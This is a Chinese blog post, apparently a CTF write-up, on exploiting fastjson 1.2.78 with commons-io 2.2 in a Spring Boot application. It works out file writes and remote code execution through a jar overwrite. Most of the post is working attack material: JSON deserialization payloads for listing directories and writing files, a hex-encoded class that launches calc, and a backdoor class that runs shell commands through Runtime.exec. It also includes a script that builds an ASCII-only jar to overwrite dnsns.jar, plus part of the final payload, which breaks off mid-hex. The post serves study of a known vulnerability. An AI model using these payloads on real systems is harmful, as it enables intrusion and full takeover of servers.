1diot9's Blog
JavaPuzzle-FastDecoder
1diot9 Lv5
  2026-02-18 14:28:33   2026-02-18 14:33:54    12.4k 字  75 分钟  

前言

题目考察fastjson高版本写文件。

大致考点如下:

  1. 利用commons-io,在fastjson高版本中写文件。
  2. io版本为2.2,触发WriterOutputStream中带有decoder的构造方法,导致只能写UTF8文件,无法写入二进制文件。
  3. Springboot写文件getshell。写入未加载的ascii jar。

分析

依赖如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter</artifactId>
    </dependency>
    <dependency>
        <groupId>org.dom4j</groupId>
        <artifactId>dom4j</artifactId>
        <version>2.1.4</version>
    </dependency>

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>

    <dependency>
        <groupId>commons-io</groupId>
        <artifactId>commons-io</artifactId>
        <version>2.2</version>
    </dependency>

    <dependency>
        <groupId>com.alibaba</groupId>
        <artifactId>fastjson</artifactId>
        <version>1.2.78</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-compress -->
    <dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-compress</artifactId>
        <version>1.5</version>
    </dependency>

    <dependency>
        <groupId>org.javassist</groupId>
        <artifactId>javassist</artifactId>
        <version>3.29.1-GA</version>
    </dependency>
</dependencies>

这里给了io依赖,又是高版本的fastjson,优先考虑文件读写。

读目录

先加载InputStream:

1
{"a":"{\"@type\":\"java.lang.Exception\",\"@type\":\"com.fasterxml.jackson.core.exc.InputCoercionException\",\"p\":{}}","b":{"$ref":"$.a.a"},"c":"{\"@type\":\"com.fasterxml.jackson.core.JsonParser\",\"@type\":\"com.fasterxml.jackson.core.json.UTF8StreamJsonParser\",\"in\":{}}","d":{"$ref":"$.c.c"}}

利用脚本读目录:

https://github.com/ph0ebus/CVE-2022-25845-In-Spring

需要稍微修改一下sendJson函数:

1
2
3
4
5
6
7
8
9
10
11
12
def sendJson(payload):
    global url
    global TIMEOUT
    proxies = {
        "http": "http://127.0.0.1:8020",
        "https": "http://127.0.0.1:8020"
    }
    headers = {
        "Content-Type": "application/json",
    }
    resp = requests.post(url, data=payload, timeout=TIMEOUT, headers=headers)
    return resp

只运行前两个step:

img

成功读出目录。

此外,选择出网脚本也可以:

https://github.com/kezibei/fastjson_payload/blob/main/web.py

img

写文件

写tomcat-docbase失败

根据上面的步骤,能看出来我是想写tomcat-docbase去加载恶意类的。但是写入的时候发现了问题,虽然文件创建了,但是没有写入任何内容。

写入payload由java-chains创建:

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
{
  "@type":"java.io.InputStream",
  "@type":"org.apache.commons.io.input.BOMInputStream",
  "delegate":{
    "@type": "org.apache.commons.io.input.AutoCloseInputStream",
    "in": {
      "@type": "org.apache.commons.io.input.TeeInputStream",
      "input": {
        "@type": "org.apache.commons.io.input.ReaderInputStream",
        "reader": {
           "@type": "org.apache.commons.io.input.CharSequenceReader",
           "charSequence": {
           "@type": "java.lang.String"
           "\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x41\x01\x00\x65\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6d\x73\x2f\x62\x65\x61\x6e\x75\x74\x69\x6c\x73\x2f\x63\x6f\x79\x6f\x74\x65\x2f\x6a\x73\x6f\x6e\x74\x79\x70\x65\x2f\x50\x6f\x6c\x79\x6d\x6f\x72\x70\x68\x69\x63\x54\x79\x70\x65\x56\x61\x6c\x69\x64\x61\x74\x6f\x72\x39\x63\x39\x65\x35\x65\x62\x37\x35\x64\x63\x39\x34\x61\x32\x61\x39\x65\x33\x35\x37\x30\x32\x39\x36\x31\x37\x36\x36\x30\x63\x35\x07\x00\x01\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x07\x00\x03\x01\x00\x04\x62\x61\x73\x65\x01\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x01\x00\x03\x73\x65\x70\x01\x00\x03\x63\x6d\x64\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x13\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x07\x00\x0b\x0c\x00\x09\x00\x0a\x0a\x00\x04\x00\x0d\x01\x00\x07\x6f\x73\x2e\x6e\x61\x6d\x65\x08\x00\x0f\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x79\x73\x74\x65\x6d\x07\x00\x11\x01\x00\x0b\x67\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x01\x00\x26\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x0c\x00\x13\x00\x14\x0a\x00\x12\x00\x15\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x07\x00\x17\x01\x00\x0b\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65\x01\x00\x14\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x0c\x00\x19\x00\x1a\x0a\x00\x18\x00\x1b\x01\x00\x03\x77\x69\x6e\x08\x00\x1d\x01\x00\x08\x63\x6f\x6e\x74\x61\x69\x6e\x73\x01\x00\x1b\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x68\x61\x72\x53\x65\x71\x75\x65\x6e\x63\x65\x3b\x29\x5a\x0c\x00\x1f\x00\x20\x0a\x00\x18\x00\x21\x01\x00\x07\x63\x6d\x64\x2e\x65\x78\x65\x08\x00\x23\x0c\x00\x05\x00\x06\x09\x00\x02\x00\x25\x01\x00\x02\x2f\x63\x08\x00\x27\x0c\x00\x07\x00\x06\x09\x00\x02\x00\x29\x01\x00\x07\x2f\x62\x69\x6e\x2f\x73\x68\x08\x00\x2b\x01\x00\x02\x2d\x63\x08\x00\x2d\x0c\x00\x08\x00\x06\x09\x00\x02\x00\x2f\x01\x00\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x07\x00\x31\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x56\x0c\x00\x09\x00\x33\x0a\x00\x32\x00\x34\x01\x00\x05\x73\x74\x61\x72\x74\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00\x36\x00\x37\x0a\x00\x32\x00\x38\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69\x74\x3e\x01\x00\x04\x63\x61\x6c\x63\x08\x00\x3b\x0a\x00\x02\x00\x0d\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65\x0a\x00\x0c\x00\x0d\x00\x21\x00\x02\x00\x0c\x00\x00\x00\x03\x00\x09\x00\x05\x00\x06\x00\x00\x00\x09\x00\x07\x00\x06\x00\x00\x00\x09\x00\x08\x00\x06\x00\x00\x00\x02\x00\x01\x00\x09\x00\x0a\x00\x01\x00\x3e\x00\x00\x00\x84\x00\x04\x00\x02\x00\x00\x00\x53\x2a\xb7\x00\x40\x12\x10\xb8\x00\x16\xb6\x00\x1c\x12\x1e\xb6\x00\x22\x99\x00\x10\x12\x24\xb3\x00\x26\x12\x28\xb3\x00\x2a\xa7\x00\x0d\x12\x2c\xb3\x00\x26\x12\x2e\xb3\x00\x2a\x06\xbd\x00\x18\x59\x03\xb2\x00\x26\x53\x59\x04\xb2\x00\x2a\x53\x59\x05\xb2\x00\x30\x53\x4c\xbb\x00\x32\x59\x2b\xb7\x00\x35\xb6\x00\x39\x57\xa7\x00\x04\x4c\xb1\x00\x01\x00\x04\x00\x4e\x00\x51\x00\x0c\x00\x01\x00\x3f\x00\x00\x00\x17\x00\x04\xff\x00\x21\x00\x01\x07\x00\x02\x00\x00\x09\x65\x07\x00\x0c\xfc\x00\x00\x07\x00\x04\x00\x08\x00\x3a\x00\x0a\x00\x01\x00\x3e\x00\x00\x00\x1a\x00\x02\x00\x00\x00\x00\x00\x0e\x12\x3c\xb3\x00\x30\xbb\x00\x02\x59\xb7\x00\x3d\x57\xb1\x00\x00\x00\x00\x00\x00",
              },
           "encoder": "iso-8859-1",
           "charset": "iso-8859-1",
           "charsetName": "iso-8859-1",
           "bufferSize": 1
        },
        "branch": {
          "@type": "org.apache.commons.io.output.WriterOutputStream",
          "writer": {
            "@type": "org.apache.commons.io.output.LockableFileWriter",
            "file": "/tmp/Calc.class",
            "charset": "iso-8859-1",
            "encoding": "iso-8859-1",
            "lockDir": "/tmp/test/",
            "append": false
          },
          "charset":"iso-8859-1",
          "charsetName":"iso-8859-1",
          "bufferSize": 1024,
          "writeImmediately": true
        },
        "closeBranch": true
      }
    },
  "include":true,
  "boms":[{
                  "@type": "org.apache.commons.io.ByteOrderMark",
                  "charsetName": "iso-8859-1",
                  "bytes":[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
                }],
  "x":{"$ref":"$.bOM"}
}

文件为空:

img

发送payload时,也没有报错回显:

img

但是我本机windows是能够顺利创建的。

改一下Dockerfile,开个远程调试看看。

最终发现这里最先进入了带有decoder的WriterOutputStream构造函数

img

导致在processInput时,没有decoder而空指针报错:

img

img

不过为什么回显时不显示报错,这个我还是不清楚。

ascii jar 写入

那现在的思路就变成了写UTF8文件,在SpringBoot下getshell。

这边先试一下能不能写入字符:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
{
  "@type":"java.io.InputStream",
  "@type":"org.apache.commons.io.input.BOMInputStream",
  "delegate":{
    "@type": "org.apache.commons.io.input.AutoCloseInputStream",
    "in": {
      "@type": "org.apache.commons.io.input.TeeInputStream",
      "input": {
        "@type": "org.apache.commons.io.input.ReaderInputStream",
        "reader": {
          "@type": "org.apache.commons.io.input.CharSequenceReader",
          "charSequence": {
            "@type": "java.lang.String"
            "\x66\x6c\x61\x67\x7b\x7b\x7b",
          },
          "encoder": "iso-8859-1",
          "charset": "iso-8859-1",
          "charsetName": "iso-8859-1",
          "bufferSize": 1
        },
        "branch": {
          "@type": "org.apache.commons.io.output.WriterOutputStream",
          "writer": {
            "@type": "org.apache.commons.io.output.LockableFileWriter",
            "file": "${file}",
            "charset": "iso-8859-1",
            "encoding": "iso-8859-1",
            "lockDir": "/tmp/test/",
            "append": false
          },
          "decoder": {"@type":"com.alibaba.fastjson.util.UTF8Decoder"},
          "charset":"iso-8859-1",
          "charsetName":"iso-8859-1",
          "bufferSize": 1024,
          "writeImmediately": true
        },
        "closeBranch": true
      }
    },
    "include":true,
    "boms":[{
      "@type": "org.apache.commons.io.ByteOrderMark",
      "charsetName": "iso-8859-1",
      "bytes":[0, 0, 0, 0, 0, 0, 0, 0]
    }],
    "x":{"$ref":"$.bOM"}
  }

成功写入:

img

查看一下Java进程的pid:

1
2
3
ls -l /proc/*/exe | grep java
或者
grep -r -a "java" /proc/*/cmdline

img

从maps文件看一下加载的jar:

img

charsets.jar是报错的时候加入的,虽然一开始也可以用,但是出现一次报错后就用不了了,容错比较低,所以先不考虑覆写charsets.jar

另外,这里由于给了docker环境,所以知道jre/lib的位置,真实环境需要自己去爆破。

所以需要找一个没被加载的jar去覆盖。

img

这里选择dnsns.jar去覆盖,因为体积比较小。

先写恶意类:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
package sun.net.spi.nameservice.dns;

import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.Scanner;

public class DNSNameServiceDescriptor extends Exception {
    private static final String paddingData = "{PADDING_DATA}";

    public void setCodez(String var1) throws Exception {
        try {
            Class.forName("java.util.Base64");
            byte[] var2 = Base64.getDecoder().decode(var1);
            defineclass(var2);
        } catch (Exception var6) {
            Class.forName("java.lang.Runtime");
            String[] var3 = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", var1} : new String[]{"/bin/sh", "-c", var1};
            InputStream var4 = Runtime.getRuntime().exec(var3).getInputStream();
            String var5 = (new Scanner(var4)).useDelimiter("\\A").next();
            throw new Exception(var5);
        }
    }

    public static void defineclass(byte[] var0) throws Exception {
        Method var1 = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
        var1.setAccessible(true);
        Class var2 = (Class)var1.invoke(Thread.currentThread().getContextClassLoader(), var0, 0, var0.length);
        var2.newInstance();
    }
}

然后用 https://github.com/c0ny1/ascii-jar 生成ascii jar:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#!/usr/bin/env python
# autor: c0ny1
# date 2022-02-13
from __future__ import print_function

import time
import os
from compress import *

allow_bytes = []
disallowed_bytes = [38,60,39,62,34,40,41] # &<'>"()
for b in range(0,128): # ASCII
    if b in disallowed_bytes:
        continue
    allow_bytes.append(b)


if __name__ == '__main__':
    padding_char = 'U'
    raw_filename = 'DNSNameServiceDescriptor.class'
    zip_entity_filename = 'sun/net/spi/nameservice/dns/DNSNameServiceDescriptor.class'
    jar_filename = 'dnsns.jar'
    num = 1
    while True:
        # step1 动态生成java代码并编译
        javaCode = """
                package sun.net.spi.nameservice.dns;


import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.Scanner;

public class DNSNameServiceDescriptor extends Exception{
    private static final String paddingData = "{PADDING_DATA}";

    public void setCodez(String var1) throws Exception {
        try {
            Class.forName("java.util.Base64");
            byte[] var2 = Base64.getDecoder().decode(var1);
            defineclass(var2);
        } catch (Exception var6) {
            Class.forName("java.lang.Runtime");
            String[] var3 = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", var1} : new String[]{"/bin/sh", "-c", var1};
            InputStream var4 = Runtime.getRuntime().exec(var3).getInputStream();
            String var5 = (new Scanner(var4)).useDelimiter("\\\\A").next();
            throw new Exception(var5);
        }
    }

    public static void defineclass(byte[] var0) throws Exception {
        Method var1 = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
        var1.setAccessible(true);
        Class var2 = (Class)var1.invoke(Thread.currentThread().getContextClassLoader(), var0, 0, var0.length);
        var2.newInstance();
    }
}
                """
        padding_data = padding_char * num
        javaCode = javaCode.replace("{PADDING_DATA}", padding_data)

        f = open('DNSNameServiceDescriptor.java', 'w')
        f.write(javaCode)
        f.close()
        time.sleep(0.1)

        os.system("D:/sec_software/jdks/jdk-1.8.0_341/bin/javac.exe -nowarn -g:none -source 1.5 -target 1.5 -cp jasper.jar  DNSNameServiceDescriptor.java")
        time.sleep(0.1)

        # step02 计算压缩之后的各个部分是否在允许的ASCII范围
        raw_data = bytearray(open(raw_filename, 'rb').read())
        compressor = ASCIICompressor(bytearray(allow_bytes))
        compressed_data = compressor.compress(raw_data)[0]
        crc = zlib.crc32(raw_data) % pow(2, 32)

        st_crc = struct.pack('<L', crc)
        st_raw_data = struct.pack('<L', len(raw_data) % pow(2, 32))
        st_compressed_data = struct.pack('<L', len(compressed_data) % pow(2, 32))
        st_cdzf = struct.pack('<L', len(compressed_data) + len(zip_entity_filename) + 0x1e)


        b_crc = isAllowBytes(st_crc, allow_bytes)
        b_raw_data = isAllowBytes(st_raw_data, allow_bytes)
        b_compressed_data = isAllowBytes(st_compressed_data, allow_bytes)
        b_cdzf = isAllowBytes(st_cdzf, allow_bytes)

        # step03 判断各个部分是否符在允许字节范围
        if b_crc and b_raw_data and b_compressed_data and b_cdzf:
            print('[+] CRC:{0} RDL:{1} CDL:{2} CDAFL:{3} Padding data: {4}*{5}'.format(b_crc, b_raw_data, b_compressed_data, b_cdzf, num, padding_char))
            # step04 保存最终ascii jar
            output = open(jar_filename, 'wb')
            output.write(wrap_jar(raw_data,compressed_data, zip_entity_filename.encode()))
            print('[+] Generate {0} success'.format(jar_filename))
            break
        else:
            print('[-] CRC:{0} RDL:{1} CDL:{2} CDAFL:{3} Padding data: {4}*{5}'.format(b_crc, b_raw_data,
                                                                                       b_compressed_data, b_cdzf, num,
                                                                                       padding_char))
        num = num + 1

如果要用其他第三方类的包,就要修改里面的编译命令,添加jasper.jar以外的jar,不同的jar之间用分号隔开

1
D:/sec_software/jdks/jdk-1.8.0_341/bin/javac.exe -nowarn -g:none -source 1.5 -target 1.5 -cp jasper.jar;xxx.jar  DNSNameServiceDescriptor.java

之后将jar上传,通过java-chains生成payload:

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
[INFO] Step1:
{"a":"{\"@type\":\"java.lang.Exception\",\"@type\":\"com.fasterxml.jackson.core.exc.InputCoercionException\",\"p\":{}}","b":{"$ref":"$.a.a"},"c":"{\"@type\":\"com.fasterxml.jackson.core.JsonParser\",\"@type\":\"com.fasterxml.jackson.core.json.UTF8StreamJsonParser\",\"in\":{}}","d":{"$ref":"$.c.c"}}

[INFO] Step2:

{
  "@type":"java.io.InputStream",
  "@type":"org.apache.commons.io.input.BOMInputStream",
  "delegate":{
    "@type": "org.apache.commons.io.input.AutoCloseInputStream",
    "in": {
      "@type": "org.apache.commons.io.input.TeeInputStream",
      "input": {
        "@type": "org.apache.commons.io.input.ReaderInputStream",
        "reader": {
           "@type": "org.apache.commons.io.input.CharSequenceReader",
           "charSequence": {
           "@type": "java.lang.String"
           "\x50\x4b\x03\x04\x0a\x00\x00\x00\x08\x00\x00\x00\x00\x00\x4d\x2e\x5a\x4a\x10\x0e\x00\x00\x1a\x09\x00\x00\x3a\x00\x00\x00\x73\x75\x6e\x2f\x6e\x65\x74\x2f\x73\x70\x69\x2f\x6e\x61\x6d\x65\x73\x65\x72\x76\x69\x63\x65\x2f\x64\x6e\x73\x2f\x44\x4e\x53\x4e\x61\x6d\x65\x53\x65\x72\x76\x69\x63\x65\x44\x65\x73\x63\x72\x69\x70\x74\x6f\x72\x2e\x63\x6c\x61\x73\x73\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x47\x4e\x71\x64\x49\x62\x65\x55\x55\x55\x56\x65\x31\x33\x33\x57\x56\x55\x45\x31\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x73\x45\x30\x73\x44\x44\x55\x66\x66\x58\x41\x47\x7f\x4b\x6b\x38\x38\x38\x52\x38\x0d\x24\x38\x44\x38\x72\x30\x43\x69\x75\x64\x49\x62\x45\x41\x74\x33\x77\x57\x44\x44\x74\x44\x44\x44\x74\x70\x44\x74\x30\x77\x33\x33\x33\x33\x33\x33\x33\x33\x73\x47\x30\x33\x33\x33\x33\x33\x33\x73\x44\x44\x66\x42\x44\x4c\x48\x7a\x5c\x48\x6a\x48\x46\x5c\x48\x66\x48\x56\x5c\x48\x76\x48\x4e\x5c\x48\x5a\x48\x6e\x74\x48\x5e\x4c\x48\x7e\x4c\x48\x41\x5c\x48\x61\x48\x51\x5c\x48\x52\x48\x71\x4c\x48\x49\x5c\x48\x52\x48\x69\x74\x48\x59\x4c\x48\x79\x4c\x48\x45\x4c\x48\x65\x4c\x48\x55\x5c\x48\x75\x48\x4d\x5c\x48\x75\x48\x6d\x5c\x48\x5d\x48\x7d\x74\x48\x43\x5c\x48\x4a\x48\x63\x4c\x48\x53\x5c\x48\x4a\x48\x73\x5c\x48\x4a\x48\x4b\x5c\x48\x74\x48\x6b\x74\x48\x5b\x4c\x48\x7b\x74\x48\x47\x74\x48\x67\x6c\x48\x57\x48\x77\x5c\x48\x6a\x48\x4f\x5c\x48\x6f\x48\x5f\x5c\x48\x7f\x08\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x43\x69\x75\x64\x49\x62\x45\x41\x74\x33\x73\x77\x57\x44\x44\x44\x47\x70\x74\x47\x44\x44\x47\x70\x44\x74\x47\x47\x44\x74\x77\x44\x44\x44\x47\x44\x44\x74\x44\x47\x44\x47\x74\x74\x73\x47\x77\x74\x74\x77\x74\x77\x77\x74\x74\x33\x33\x33\x33\x33\x77\x77\x30\x33\x33\x33\x33\x73\x44\x66\x42\x44\x75\x5c\x48\x55\x48\x4d\x74\x48\x6d\x5c\x48\x45\x48\x5d\x5c\x48\x65\x48\x7d\x5c\x48\x76\x48\x43\x74\x48\x63\x68\x48\x7c\x47\x4d\x7d\x7d\x73\x5b\x53\x71\x4d\x77\x4d\x68\x48\x5a\x69\x4b\x4d\x6f\x4d\x5e\x6b\x4d\x5b\x53\x5e\x59\x77\x67\x73\x5b\x53\x7e\x68\x48\x62\x51\x7b\x5b\x57\x77\x4d\x5b\x77\x79\x4d\x6b\x4f\x43\x4c\x48\x53\x68\x48\x54\x41\x73\x5b\x73\x77\x61\x68\x48\x78\x4e\x6e\x79\x68\x48\x44\x51\x7b\x7d\x43\x68\x48\x4c\x57\x43\x77\x51\x7b\x7d\x43\x7f\x68\x48\x66\x4e\x69\x4b\x4d\x6f\x4d\x5e\x6b\x4d\x5b\x53\x5e\x59\x77\x67\x73\x5b\x53\x7e\x6e\x79\x68\x48\x5c\x49\x5f\x5d\x43\x47\x77\x73\x7b\x5b\x57\x68\x48\x7c\x7d\x43\x63\x73\x5b\x43\x5d\x6b\x4d\x57\x57\x68\x48\x64\x0e\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x43\x69\x75\x64\x49\x62\x45\x41\x74\x33\x77\x77\x57\x47\x30\x73\x74\x44\x74\x77\x44\x44\x77\x47\x70\x44\x74\x44\x47\x70\x44\x44\x77\x44\x47\x44\x74\x44\x44\x74\x77\x77\x74\x33\x33\x33\x33\x33\x33\x33\x77\x30\x33\x33\x33\x33\x47\x44\x44\x66\x42\x44\x71\x5e\x7a\x51\x42\x48\x66\x48\x56\x68\x48\x4a\x4d\x49\x47\x49\x66\x7b\x5b\x75\x5d\x66\x5e\x49\x6b\x45\x6e\x76\x42\x48\x55\x48\x75\x74\x48\x4d\x42\x48\x6d\x48\x43\x74\x48\x63\x42\x48\x53\x48\x73\x42\x48\x76\x48\x4e\x68\x48\x5a\x4d\x49\x47\x